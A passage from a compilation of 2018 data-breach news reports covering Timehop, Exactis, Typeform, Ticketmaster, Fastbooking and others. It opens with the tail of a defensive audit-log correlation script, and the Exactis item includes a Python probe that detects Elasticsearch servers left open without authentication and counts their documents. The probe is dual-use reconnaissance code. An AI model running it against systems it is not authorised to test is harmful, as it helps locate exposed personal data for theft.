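HIGH_IMPACT = {"ExportSnapshot", "ModifyDBPassword"}
DORMANCY = timedelta(days=30)                 # a long gap between sessions of a new account
SEVERITY_RANK = {"none": 0, "medium": 1, "high": 2, "critical": 3}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def correlate(events, known_principals=KNOWN_PRINCIPALS, known_countries=KNOWN_COUNTRIES):
    """Walk the trail in time order and emit findings that build on earlier events."""
    findings = []
    created = {}    # principal created inside the window -> creating event
    last_seen = {}  # principal -> time of its previous activity

    def add(e, rule, severity, subject=None):
        findings.append({"ts": e["ts"], "rule": rule, "severity": severity,
                         "actor": subject or e["actor"]})

    for e in sorted(events, key=lambda x: x["ts"]):
        t, actor = parse_ts(e["ts"]), e["actor"]
        foreign = e["country"] not in known_countries
        if e["action"] == "ConsoleLogin" and not e["mfa"]:
            add(e, "login-without-mfa", "high" if foreign else "medium")
        if e["action"] == "CreateUser":
            created[e["target"]] = e
            if not e["mfa"] or foreign:
                add(e, "principal-created-in-unverified-session", "medium", e["target"])
        if e["action"] in PRIVILEGE_GRANTS and e.get("target") in created:
            add(e, "new-principal-granted-admin", "critical", e["target"])
        if actor in created and actor in last_seen and t - last_seen[actor] > DORMANCY:
            add(e, "dormant-created-principal-active", "high")
        if e["action"] in HIGH_IMPACT:
            # A bulk export or a credential change on production data is never
            # "probably maintenance" by default; an unknown principal makes it critical.
            add(e, "high-impact:" + e["action"], "critical" if actor not in known_principals else "high")
        last_seen[actor] = t
    return findings


def triage(findings):
    """Holiday or not: anything high or critical pages someone now."""
    worst = max((f["severity"] for f in findings), key=SEVERITY_RANK.get, default="none")
    return "page-now" if SEVERITY_RANK[worst] >= SEVERITY_RANK["high"] else "review-next-business-day"


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f["ts"], f["severity"].upper(), f["rule"], f["actor"])
    print(triage(correlate(EVENTS)))
```

The two rules that carry the weight are the stateful ones: a privilege grant to a principal that did not exist before the window, and activity by such a principal after a long silence. Neither is visible from a single event, which is why a password-change alert on its own was read as maintenance.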


Timehop data breach, data from 21 million users exposed
11.7.18 securityaffairs Incindent

Timehop, the service that resurfaces users' past social media posts so they can reconnect over them, has been hacked.

“Timehop created the digital nostalgia category and continues to be THE team reinventing reminiscing for the digital era. We have more “old” photos and content than ever before, yet most of the internet focuses on “new”.” reads its website.

The Timehop service pulls posts from many social networks to build an archive of each user's past, and that archive depends on an access token for every network it reads from.

The company admitted that data describing 21 million members may have been exposed.

Unknown attackers breached its systems; the company discovered the intrusion while the data was still being exfiltrated.

“On July 4, 2018, Timehop experienced a network intrusion that led to a breach of some of your data. We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. While our investigation into this incident (and the possibility of any earlier ones that may have occurred) continues, we are writing to provide our users and partners with all the relevant information as quickly as possible.” reads the data breach notification published by the company.

Stolen data includes names, email addresses, and some phone numbers. No private or direct messages, financial data, social media or photo content, or Timehop data such as streaks were exposed.

The company pointed out that none of the users’ “memories,” – the social media posts & photos that Timehop stores, were accessed by the attackers.

The company admitted that the attackers obtained an access credential for its cloud computing environment, which was not protected by multifactor authentication.

The security team locked the attackers out two hours and nineteen minutes after discovering the intrusion.

The attackers also accessed the tokens that let Timehop read and display users' social media posts (but not private messages). Timehop has deactivated them, so users will have to re-authenticate each service in the app.


The bad news is that these tokens gave access to users' accounts on other social networks such as Twitter, Facebook, and Instagram. Timehop notes that the tokens were revoked promptly and no longer work.

“Second, we want to be clear that these tokens do not give anyone (including Timehop) access to Facebook Messenger, or Direct Messages on Twitter or Instagram, or things that your friends post to your Facebook wall. In general, Timehop only has access to social media posts you post yourself to your profile.” continues the company’s notification.“However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts – again, we have no evidence that this actually happened.“

Timehop is advising users who provided a phone number for authentication to take additional precautions with their cellular provider, such as a port-out PIN, so that the number cannot be ported to an attacker's SIM.

The company says it has since hardened its architecture, including multifactor authentication on all accounts used for authorization and access control.

Technical details about the incident have been published in a separate post by the company.


Massive Breach at Data Broker Exactis Exposes Millions of Americans
2.7.18 securityweek  Incindent

Security researcher Vinny Troia has discovered another sensitive database exposed on the internet. This one runs Elasticsearch, a search engine that serves its data over a plain HTTP API. Elasticsearch can be protected with authentication and role-based access control (at the time a paid X-Pack feature), but an instance bound to a public interface with no security layer in front of it answers any query sent to it, and not all customers deploy the protection.

Troia was interested in Elasticsearch security and used Shodan to find U.S. Elasticsearch databases visible on the internet. According to a report in Wired, he found around 7,000. One stood out -- a database owned by Florida-based data broker firm Exactis and containing personal data on both consumers and businesses.

What makes this discovery exceptional was the sheer size of the database, the sensitivity of the content, and the complete lack of security. Precise details are difficult to ascertain, and Exactis has not been forthcoming with details. However, it appears to contain something like 340 million records (230 million on consumers and 110 million on business contacts); making it a far bigger potential breach than last year's Equifax breach.

The Exactis website claims the firm has consumer data on 218 million individuals and 110 million households. Eighty-eight million have email addresses and matching postal addresses, and 112 million include residential phone numbers. Business data includes 21 million companies, 40 million postal addresses, 21 million records with email addresses and matching postal address, and 52 million with business phone numbers.

How much of this was exposed is not known, but it is potentially everything. It doesn't include social security numbers or payment details, but goes into great detail for each individual, including interests, habits and the age and gender of children. It apparently includes more than 400 variables ranging from religion, pets, whether a person smokes, to personal interests.

Troia reported his findings to both Exactis and the FBI; and the database is no longer accessible. However, there is no way of knowing whether anyone other than Troia also located and accessed the data. While Exactis sells this data to businesses to help compile compelling and personalized marketing campaigns, in the hands of cyber criminals the same data could equally be used to compile compelling and personalized phishing campaigns. Any hope that cyber criminals don't use Shodan in the same way and to the same effect as Troia is unfounded.
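The check Troia performed is easy to run against your own address space before someone else does. The following Python is an added example, not Troia's tool or Exactis's configuration: it asks a host the two questions an anonymous Elasticsearch client can ask (the root document, which reports cluster name and version, and `_cat/indices`, which reports per-index document counts) and classifies the result as open, authentication required, not Elasticsearch, or unreachable. The hostnames, cluster name and counts in the constructed responses are invented so the example runs offline; pass `http_get` instead of `fetch_offline` to probe a real host you are authorised to test.

```python
import json
import urllib.error
import urllib.request

INDICES_PATH = "/_cat/indices?format=json&h=index,docs.count,store.size"


def http_get(url, timeout=5):
    """Live fetcher: an anonymous GET returning (status, body). Network required."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe_elasticsearch(base_url, fetch=http_get):
    """Classify a host as open / auth-required / not-elasticsearch / unreachable.

    For an open node, report cluster name, version and the total document count,
    which is the figure a data-broker dump like the one above would show.
    """
    base = base_url.rstrip("/")
    try:
        status, body = fetch(base + "/")
        if status in (401, 403):
            return {"state": "auth-required"}
        if status != 200:
            return {"state": "http-%d" % status}
        try:
            root = json.loads(body)
        except ValueError:
            return {"state": "not-elasticsearch"}
        if not isinstance(root, dict) or "cluster_name" not in root or "version" not in root:
            return {"state": "not-elasticsearch"}
        status, body = fetch(base + INDICES_PATH)
        indices = json.loads(body) if status == 200 else []
    except OSError as err:  # urllib.error.URLError is an OSError, so this covers refused/timeouts
        return {"state": "unreachable", "detail": str(err)}
    docs = sum(int(i.get("docs.count") or 0) for i in indices)
    return {
        "state": "open",
        "cluster": root["cluster_name"],
        "version": root["version"].get("number"),
        "indices": sorted(i["index"] for i in indices),
        "docs": docs,
    }


# Constructed responses standing in for four hosts so the example runs offline.
# The hostnames, cluster name and counts are invented, not Exactis data.
CONSTRUCTED = {
    "http://open.example:9200/": (200, json.dumps({"cluster_name": "marketing", "version": {"number": "6.2.4"}})),
    "http://open.example:9200" + INDICES_PATH: (200, json.dumps([
        {"index": "consumers", "docs.count": "1200", "store.size": "4.1mb"},
        {"index": "business_contacts", "docs.count": "800", "store.size": "2.3mb"},
    ])),
    "http://locked.example:9200/": (401, json.dumps({"error": "missing authentication credentials"})),
    "http://web.example/": (200, "<html><body>hello</body></html>"),
}


def fetch_offline(url):
    if url not in CONSTRUCTED:
        raise OSError("connection refused")
    return CONSTRUCTED[url]


if __name__ == "__main__":
    for host in ("http://open.example:9200", "http://locked.example:9200",
                 "http://web.example", "http://gone.example:9200"):
        print(host, probe_elasticsearch(host, fetch_offline))
```

A node only ends up in Shodan's results when `network.host` in elasticsearch.yml has been pointed at a public address (the default binds to loopback) and nothing sits in front of it; the fix for an "open" result is to bind it back to a private interface or put authentication and a firewall between it and the internet, then check the access logs for the period it was exposed.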

Robert Capps, VP and Authentication Strategist for NuData Security comments, "If U.S. citizens did not think their personal information has ever been compromised, this should convince them it definitely is. This latest breach blows up the 2018 tab with 230-million records exposed in just one incident."

Chris Olson, CEO of The Media Trust, believes that government must now take a lead. "Data providers need to keep in mind that they are prime targets for cybercriminals who want to commit identity theft and have tools to find databases on publicly accessible servers. While we have yet to find out whether the data they have exposed on a public server has been misappropriated by malicious actors, the scope of and negligence behind this leak could prompt greater demand among already wary U.S. consumers for stronger regulations around data privacy like the EU's GDPR. Such regulations would restrict how personal data is not only stored but used in the U.S."

Carl Wright, chief revenue officer for AttackIQ, holds a similar view. "When a breach such as this occurs, it reinforces the need for government to hold these organizations accountable to the individuals impacted. This will be the only way to ensure that corporations take the necessary steps to secure consumer data. Corporations and government entities must be required to continuously prove that their cyber security protections are able to defeat or detect attackers."

This already happens in Europe with the EU's General Data Protection Regulation (GDPR). It seems to be beginning in the U.S. Yesterday, California Gov. Jerry Brown signed the California Consumer Privacy Act of 2018 (Assembly Bill 375).

"With GDPR now in full effect," comments Richard Henderson, global security strategist at Absolute, "I've been expecting legislation such as this to start to reach consumer-focused states in the US for some time. Other states like New York and Massachusetts will likely follow suit and draft their own citizen-friendly data rights laws. Many individual states will not sit on their hands waiting for a federal initiative that may never come."

The California Act will not come into effect until the beginning of 2020 -- but it will undoubtedly make firms like Exactis re-evaluate what they do, how they do it, and how they secure it. The legislation says, for example, "The bill would require a business to make disclosures about the information and the purposes for which it is used. The bill would grant a consumer the right to request deletion of personal information and would require the business to delete upon receipt of a verified request, as specified."

Meanwhile, 'victims' of the Exactis breach are not waiting for the new law. A proposed class action was lodged in the Florida federal court on Thursday, claiming that Exactis made no attempt to follow best practice guidelines to protect the data. "Despite these well-publicized Senate and other expert reports, defendant failed to heed the recommendations, and inexplicably left its server -- and the personal information which rested thereon -- vulnerable and available to even the most basic cyberattack," claims the suit. It asserts negligence, unjust enrichment claims, and claims under Florida's Deceptive and Unfair Trade Practices Act, and seeks compensatory, punitive, and exemplary damages.

Referring to the California Act, Henderson adds, "I think we are on the threshold of a new period of customer-focused data protections. State and local governments have waited a long time for organizations to take care of this, and based on the colossal number of breaches and rampant digital thefts that continue to occur, they've had enough."


Typeform Data Breach Hits Many Organizations
2.7.18 securityweek  Incindent

Typeform, a Spain-based software-as-a-service (SaaS) company that specializes in online forms and surveys, has suffered a security breach that resulted in the data collected by its customers getting stolen.

According to a notice posted on its website, Typeform identified the breach on June 27 and addressed its cause roughly half an hour later. The company says an attacker managed to download a backup file dated May 3 from one of its servers.

The compromised file stored names, email addresses and other pieces of information submitted by users through Typeform forms. Data collected after May 3, payment information, and passwords are not impacted, Typeform said.

UK-based mobile banking service Monzo is one of the impacted organizations. Monzo says the breach affects roughly 20,000 individuals, the vast majority of whom only had their email address exposed. However, in some cases, information such as postcode, name of the old bank, Twitter username, university, city, age and salary range, and employer was also compromised. Monzo says it has ended its relationship with Typeform following the incident.

The Tasmanian Electoral Commission was also hit by this breach. The organization notes that while some of the stolen data is already public, the attacker may have also obtained names, addresses, email addresses, and dates of birth submitted by electors when applying for an express vote at recent elections.

The list of organizations that have notified customers of the Typeform breach also includes Thriva, Birdseye, HackUPC, and Ocean Protocol.

Typeform last year claimed to have 30,000 paying customers and many more using its free service. Companies such as Apple, Uber, Facebook, Adobe, Airbnb, WeTransfer and BBC are also said to have used its services at some point. The company’s website currently lists Trello, HubSpot, Indiegogo, Forbes, and Freshdesk as customers.

Typeform has assured customers that it has identified and addressed the source of the breach. The company claims it has initiated a comprehensive review of its system security and is taking “significant measures” to prevent such incidents from occurring in the future.

However, shortly after the data breach was disclosed, one Twitter user claimed to have identified another vulnerability in Typeform systems.


Data Broker Exactis data breach, one of the biggest ever, exposes millions of Americans
1.7.18 securityaffairs Incindent

Security expert Vinny Troia has found a huge trove of data belonging to millions of Americans that were left unsecured online.
The security researcher Vinny Troia was analyzing the level of security of Elasticsearch installs exposed online when he discovered millions of records belonging to Americans that were left unsecured.

The expert used Shodan to find U.S. Elasticsearch databases exposed on the internet; the query returned around 7,000 instances. One of them immediately appeared very interesting: an archive owned by the US data broker Exactis that contained personal data on both consumers and businesses.

“Earlier this month, security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server. The haul comprises close to 2 terabytes of data that appears to include personal information on hundreds of millions of American adults, as well as millions of businesses.” reported Wired.

“While the precise number of individuals included in the data isn’t clear—and the leak doesn’t seem to contain credit card information or Social Security numbers—it does go into minute detail for each individual listed, including phone numbers, home addresses, email addresses, and other highly personal characteristics for every name.”

The archive contained roughly 340 million records (230 million on consumers and 110 million on business contacts), making this probably the biggest potential breach ever seen.

According to the Exactis website, the firm gathered consumer data on 218 million individuals and 110 million households.

The archive contains 88 million records that include email addresses and postal addresses, while 112 million records include residential phone numbers.

Business data includes 21 million records of companies, 40 million postal addresses, 21 million records with email addresses and postal address, and 52 million business phone numbers.

The good news is that the archive did not include credit card information or Social Security numbers.

At the time it is not clear how extensively the archive was exposed, but experts believe it was completely exposed online. The archive includes interests, habits, the age and gender of children, and more than 400 variables covering religion, pets, whether a person smokes, and more.

Such detailed profiles could allow attackers to launch effective spear phishing campaigns.

The security expert promptly reported his findings to the FBI and Exactis, and the company immediately secured the database.

Customers proposed a class action in the Florida federal court last week claiming that Exactis did not implement best practice guidelines to protect the data.


The popular online survey software Typeform suffered a security breach
30.6.18 securityaffairs Incindent

Typeform, the popular online survey platform, has suffered a data breach that exposed partial data of some users; no payment card data was stolen.

Typeform, the popular online survey platform, is the latest victim of a data breach. Typeform software is widely adopted by businesses worldwide to easily arrange surveys; it allows easy creation of interfaces to collect user data.

The company has confirmed the security breach that exposed partial data of some users.

“On June 27, 2018, our engineering team became aware that an unknown third party gained access to our server and downloaded certain information. As a result of this breach, some data was compromised.” reads the data breach notification published by the company.

According to Typeform, no payment card data or password information for the website had been exposed in the security breach.

The Spanish firm discovered the intrusion on June 27th, and immediately launched an internal investigation.

The experts discovered that attackers accessed company servers and downloaded a partial data backup for surveys conducted before May 3rd, 2018.

The company identified the vulnerability exploited by the hackers and patched it within a few hours, then notified the affected users of the incident.

At the time there is no information about the flaw exploited by the hackers; the company highlighted that even if customers collected payments via Typeform’s Stripe integration, the payment details they have collected are safe.

One of Typeform’s customers, the digital mobile bank Monzo, confirmed that personal data of about 20,000 people is likely to have been exposed due to the security breach.

“Our initial investigations suggest that some personal data of about 20,000 people is likely to have been included in the breach.” reads the security advisory published by Monzo.

“For the vast majority of people, this was just their email address. For a much smaller proportion of others, this may have included other data like their Twitter username or postcode. We’ve published a full breakdown at the bottom of this post.”

Unfortunately, the number of data breaches continues to increase, and a growing number of personal details are flooding the black marketplaces.

Yesterday the sportswear company Adidas announced a potential data breach that affected millions of its U.S. customers, while the global entertainment ticketing service Ticketmaster suffered the same problem.


Ticketmaster Blames Third Party Over Data Breach
29.6.18 securityweek  Incindent

Ticketmaster UK has had the personal information of thousands of customers compromised. This may include name, address, email address, telephone number, payment details and Ticketmaster login details, the company said.

How many accounts have been compromised has not been specified, although the company says in a statement, "Less than 5% of our global customer base has been affected by this incident," adding, "Customers in North America have not been affected."

Details of the hack have not yet been disclosed other than it involved 'an unknown third-party'. The statement says that it identified malicious software on a support product hosted by Inbenta Technologies (part of Ticketmaster's supply chain). It did this on Saturday, June 23, and immediately 'disabled the Inbenta product across all Ticketmaster websites.'

Ticketmaster clearly feels that Inbenta is at fault. Inbenta takes a slightly different view. In its own statement, CEO Jordi Torras writes, "it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements." The attackers located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.

But Torras adds, "Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability." In other words, it is Ticketmaster that is at fault.

James Romer, chief security architect at SecureAuth + Core Security, explains, "a customer service chatbot was compromised by malware and exported UK customers' data to an unknown third-party." In fact, the breach could extend to other nations. While Ticketmaster says, "we understand that only certain UK customers" are affected, it also says it is notifying all Ticketmaster International customers (outside of the U.S.) that they need to reset their passwords.

Ticketmaster has further concerns to consider. According to Monzo -- an online-only bank based in East London -- it warned Ticketmaster about a potential breach in early April. Monzo had detected fraudulent card activity that seemed to point to a Ticketmaster common factor. In a blog posted Thursday by Natasha Vernier, Monzo's head of financial crime, she explains that the bank reached out to Ticketmaster, and on 12 April, "members of the Ticketmaster security team visited the Monzo office so we could share the information we'd gathered. They told us they'd investigate internally."

Within a week, Monzo was sufficiently concerned and certain that it shared its information with the U.S. Secret Service, and started to proactively replace every Monzo customer card that had been used at Ticketmaster (about 6000).

One week after its security team visited Monzo's offices, Ticketmaster informed Monzo that it had found no evidence of a breach and that no other banks were reporting similar patterns. The breach wasn't actually found until some ten weeks after Monzo first raised its concerns.

"There are going to be a few eyebrows raised this morning about this breach and when Ticketmaster really discovered it," comments Tony Pepper, CEO and co-founder at Egress. "Clearly data was at risk for some time, and apparently Ticketmaster had been alerted to the issue but didn't heed those warnings. It is going to be interesting to see how the ICO reacts when they get to the bottom of this, given the emphasis now placed on data breach reporting and reflected in the changes made under the GDPR."

This was a supply chain attack that took a long time to detect even when the company was told it had been breached. Supply chain attacks are increasing. "It's not uncommon for companies to be breached via a third-party supplier, which is why it's important to carefully consider who to work with and what security protocols they have in place," comments Andrew Bushby, UK director at Fidelis Cybersecurity.

It's worth noting that the UK government's new Minimum Cyber Security Standard for government departments actually specifies that the supply chain should be required to meet the UK's Cyber Essentials level 6.

Joseph Carson wonders whether artificial intelligence will become embroiled in the case. "Many companies are using chat bots to help automate their customer experiences, having been lured into fancy buzzwords like machine learning, artificial intelligence and virtual assistance," he notes. While the theft of personal details, financial information and passwords means these are now available on the darknet for cybercriminals to abuse, he wonders what else might have been stolen. "It will be interesting to learn," he suggests, "whether the cybercriminals also accessed the artificial intelligence information that could be used for a more targeted type of attack."

The danger to victims of this breach is primarily twofold: fraudulent use of the stolen payment details, and more calculated identity theft. "The fact that payment card information has been caught up in this breach is hugely concerning," comments Brooks Wallace, Head of EMEA for Trusted Knight. "In cases like this, details often end up for sale on the dark web, rather than in the hands of the original hackers themselves, and then end up being used for fraudulent transactions and in some cases identity theft.

"When used to make transactions, fraudsters often start by testing small transactions here to make sure it works and then ramp up to bigger purchases. Anyone who thinks they may have been caught up in this breach needs to keep a very careful eye on their bank accounts and potentially should contact their bank to change their cards." In reality, any customer of Ticketmaster, whether a victim of this breach or not, will need to be wary of the inevitable opportunistic phishing emails that follow any such breach.

One aspect of this breach will only become clear over time: how will the European data protection regulators react in relation to the General Data Protection Regulation. It's a moot point since the actual breach occurred prior to the activation of GDPR, although internal recognition and victim notification both occurred within GDPR. The UK's ICO will probably treat the case similar to the Dixons Carphone breach: "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts."


Possible Data Breach at Adidas Could Impact Millions of U.S. Customers
29.6.18 securityweek  Incindent

German sportswear company Adidas on Thursday revealed that it launched an investigation after learning of a potential data breach that could impact millions of its U.S. customers.

In a notice posted on its website, Adidas said an unauthorized party claimed to have gained access to customer information. The company learned of the possible breach on June 26 and called in cybersecurity experts and law enforcement to assist in the investigation.

The unauthorized party may have obtained usernames, password hashes and contact information – which the company describes as “limited data” – of individuals who made purchases on Adidas’ US website, adidas.com/US.

Adidas says there is no evidence that credit card or fitness information has been compromised.

Adidas told some media outlets that the incident could impact “a few million” customers, but its statement suggests that not all customers in the United States are affected.

“While adidas continues its thorough forensic review, adidas is alerting relevant consumers,” the company stated.


Ticketmaster suffered a data breach and blamed a third-party provider over the incident
29.6.18 securityaffairs Incindent

The entertainment ticketing service Ticketmaster announced it has suffered a data breach that exposed personal and payment customer information.
Hackers accessed name, address, email address, telephone number, payment details and Ticketmaster login details of company customers.

According to the company, attackers installed malicious code on a customer support product hosted by Inbenta Technologies, an external third party. Hackers compromised a third-party customer service chat application deployed on the UK website to steal personal and payment information from customers who purchased tickets.

At the time, there is no information about the extent of the incident; experts believe that it may have affected tens of thousands of the company's customers.

“On Saturday, June 23, 2018, Ticketmaster UK identified malicious software on a customer support product hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster.” reads the data breach notification published by Ticketmaster.

“As soon as we discovered the malicious software, we disabled the Inbenta product across all Ticketmaster websites. Less than 5% of our global customer base has been affected by this incident. Customers in North America have not been affected.”

The ticketing service disabled the Inbenta support customer service chat application from all of its websites.

Inbenta Technologies denied any responsibility and blamed Ticketmaster for having installed its chat application improperly. The company explained that hackers exploited a single piece of JavaScript code customized specifically for the ticketing company, which had deployed it directly on its payments page without notifying the Inbenta team.

“Upon further investigation by both parties, it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster’s particular requirements. This code is not part of any of Inbenta’s products or present in any of our other implementations.” reads a statement published by Inbenta.

“Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability. The attacker(s) located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.”

The ticketing service has launched an investigation to determine the responsibility for the incident and is working with authorities, as well as financial institutions to limit the extent of the incident.


Fastbooking Hack Leaves Japan Hotel Red-Faced
28.6.18 securityweek Incindent

A Japanese hotel chain has apologised after more than 120,000 items of customer information were stolen in hacks of its reservation system, which is handled by French company Fastbooking.

Prince Hotel, a major Japanese hotel operator, said the breach occurred when hackers attacked Paris-based Fastbooking, which manages its foreign-language bookings.

A Fastbooking spokeswoman confirmed that the company had been hacked on June 14 and had not detected the attack until June 19.

"All of our markets have been affected but this represents a minority of our customers," she said.

She declined to say how many hotels were affected, but said Japanese data made up a large proportion of the hacked information.

Fastbooking, a subsidiary of French multinational AccorHotels, handles reservations for some 4,000 hotels in 40 countries.

Prince Hotel said the server for its English, Chinese and Korean-language websites was hacked twice earlier this month and a total of 124,963 items of information such as names, credit card numbers and addresses were stolen.

"There was unauthorised access to the servers of Fastbooking in France," the hotel said in a statement.

The hotel said names, home addresses, phone numbers and other personal information of customers who had booked rooms between May and June 2017 were taken, and that credit card numbers were stolen from customers who had made reservations before August 2017.

Prince Hotel president Masahiko Koyama apologised and bowed deeply at a press conference on Tuesday.

"We're deeply sorry for causing great concern and trouble," he said.

The hotel chain said it was suspending its websites until it could ensure their security.


FastBooking Hotel booking software firm suffered a data breach
28.6.18 securityaffairs Incindent

A security breach suffered by the hotel booking software provider FastBooking has affected hundreds of hotels worldwide.
The hotel booking software provider FastBooking is the latest victim of a data breach; the incident exposed personal details and payment card data of guests from affected hotels.

FastBooking offers a hotel booking platform to more than 4,000 hotels in 100 countries.

According to the experts, the number of impacted hotels worldwide could be greater than 1,000, roughly 380 of them in Japan alone. The company did not provide details about the number of affected users.

The company promptly notified each affected hotel of the incident via email, providing details about the number of affected guests.

“Following the discovery of a suspicious application, the server log files were analyzed (computer activity traces) and we found out that some files containing data had leaked.” reads a notice published by the company.

“Fastbooking immediately eradicated the vulnerability and took steps to prevent this incident from recurring and to mitigate any negative consequences: implementing higher security standards, changing passwords on our systems, and so on.”

The attackers exploited a vulnerability in the web app to break into the FastBooking system.

The breach was discovered by company staff who noticed the presence of malware on the server. The malware is a backdoor that allows the attacker to gain control over the server and steal sensitive data.

The company notified the data breach via email: hackers compromised the server on June 14 and installed malware that was used to exfiltrate the data.

The hotel chain Prince Hotels & Resorts in Japan already notified the data breach to its customers. The hotel chain announced that the incident affected 124,963 guests who stayed at 82 of its hotels.

“This notice is to make you aware that Prince Hotels & Resorts reservations system in English, Simplified Chinese, Traditional Chinese, and Korean have been impacted by an unauthorized access to or acquisition of your personal information.” reads the data breach notification.

“We have learned that Fastbooking in France which is a parent company of Fastbooking Japan, our reservations system operator for international guests, had an unauthorized access.”

Below the incident timeline:
June 14, 2018, 8:43 PM UTC – hackers breached FastBooking’s server.
June 19, 2018, 3:40 PM UTC – The company discovers the intrusion.
June 19, 2018, 9:02 PM UTC – The company closes the breach.

Experts believe this data breach could trigger a series of data breach notifications from all the affected hotels.


Flight tracking service Flightradar24 suffered a data breach
21.6.18 securityaffairs  Incindent

The popular flight tracking service Flightradar24 has discovered a data breach that affected one of its servers.
The company notified users of the incident via email and asked them to change their passwords; the passwords of affected users have been reset.

FlightRadar24 promptly reported the incident to the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).

According to Flightradar24, hackers may have accessed email addresses and password hashes associated with accounts registered prior to March 16, 2016.

At the time there is no information about the hashing algorithm that was used to protect the passwords.

Initially many users that received the message believed that the data breach notification was the result of a phishing campaign because there was no official news from Flightradar24, but later the company admitted the incident and confirmed that the emails were legitimate.

Senile Delinquent (@SenileDelinque1), 18 Jun: "@flightradar24 Is this for real or is a phishing expedition? Clicking on the Unsubscribe link at the end of the email takes me to an odd website. Anyone else had this? pic.twitter.com/3P0Lensv5B"

Flightradar24 (@flightradar24), 4:13 PM - Jun 18, 2018: "Hello, it is legitimate. We have already invalidated your old password and the link in the email will allow you to create a new password. We apologize for any inconvenience this may cause."

A moderator of the Flightradar24.com forum confirmed that no personal and financial information was exposed.

“We can confirm that the email some of our users received in regards to a security breach has been sent by us. The security breach may have compromised the email addresses and hashed passwords for a small subset of Flightradar24 users (those who registered prior to March 16, 2016).

We would like to apologize that this breach occurred and for the inconvenience this may cause. We would also like to stress that we have no indication that any personal information was compromised.” wrote a company spokesman on the official forum.

“The security breach was limited to one server and it was promptly shut down once the intrusion attempt had been ascertained. An email has been sent to users with affected accounts. Please note that no payment information has been compromised. Flightradar24 neither handles nor stores payment information.”

The company added that it has contained the incident: as soon as it discovered that one of its servers was compromised, it shut the machine down.

The bad news is that the company admitted the passwords were protected by an old hashing algorithm that allows attackers to crack the hashes; Flightradar24 only introduced a more secure hashing algorithm in 2016.

At the time it is not clear how many users have been affected; the company reported that the incident involved only a “small subset” of users.

FlightRadar24 claims to have over 40 million users per month, so the number of affected users could still be significant.


Data Stolen in OPM Breach Used in Loan Fraud Scheme
19.6.18 securityweek Incindent

Two individuals pleaded guilty recently over their role in a scheme that involved fraudulent loans obtained using personal information stolen in the massive breach at the U.S. Office of Personnel Management (OPM).

A Maryland woman, Karvia Cross, pleaded guilty on Monday and a co-defendant, Marlon McKnight, admitted being involved in the scheme on June 11. The two pleaded guilty to conspiracy to commit bank fraud and aggravated identity theft. Cross will be sentenced on October 26.

According to authorities, the fraudsters used personal information stolen from the OPM to obtain personal and vehicle loans through the Langley Federal Credit Union (LFCU).

In 2015 and 2016, the financial organization received many online membership and loan applications using identity data compromised in the OPM breach, and the requests were approved prior to LFCU learning that they had been sought using stolen identities.

The fraudsters then withdrew the fraudulently obtained proceeds from the LFCU accounts they had opened.

It’s unclear how the fraudsters obtained the data stolen in the OPM breach. U.S. authorities have blamed Chinese hackers for the attack and last year the FBI even arrested a Chinese national suspected of being involved in the development of the Sakura exploit kit, which was allegedly used in the campaign.

Described as one of the largest breaches of government data in U.S. history, the OPM incident occurred in 2014 and 2015, and it resulted in the theft of personal information from the background checks of roughly 22 million people.


5.9 Million Card Details Accessed in Dixons Carphone Hack
14.6.18 securityweek  Incindent 

Dixons Carphone, a household name in the UK, announced (PDF) today that it is investigating "unauthorised access to certain data held by the company." It describes this access as "an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores," and "1.2m records containing non-financial personal data, such as name, address or email address..."

This may turn out to be the biggest ever breach in the UK.

Right now, nothing has been disclosed on how the breach was effected, nor who might be the culprit. There are reports, however, that the incursion started almost a year ago in July 2017. With no technical details available, interest is focusing on why it took so long to discover the breach; how the company is handling the disclosure and notification; and whether the data protection regulator will consider the breach under the UK Data Protection Act 1998, or the EU's General Data Protection Regulation (GDPR) that came into effect on May 25.

The ICO's own statement gives nothing away. A spokesperson said, "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts." For the latter, read 'GDPR' until the UK's Brexit takes effect.

The ambiguity arises because the breach occurred – or at least commenced – in pre-GDPR times. What we don't know is when Dixons Carphone discovered the breach. Since May 25 it will (probably) have been subject to the very strict GDPR breach notification rules.

If the whole incident is considered under GDPR rules, the ICO could potentially fine Dixons Carphone up to 4% of its annual global revenue. Last year the group reported total sales of £10.5 billion ($14 billion). A fine under GDPR could be many hundreds of millions of pounds. Under the Data Protection Act 1998, the maximum fine would be just £500,000 ($670,000).

Technical concerns focus on why it took so long for Dixons Carphone to discover the breach. Robert Wassall, data protection lawyer and head of legal services at ThinkMarble, comments, "The fact that this breach has only just been identified through a routine security review can be viewed from two sides. Yes, it's great that this breach was identified as it proves that the review process and scanning for vulnerabilities works. On the other hand, the breach began in July 2017, why wasn't it identified sooner? How often is security scanning done, given that it has taken almost a year to be found?"

Ross Brewer, VP and MD EMEA at LogRhythm, is less accommodating. "The scale and time-frame of this data breach is staggering," he says. "Initial attempts to access data began in July last year, yet this was only discovered over the past week, indicating that the company lacks vital threat detection capabilities."

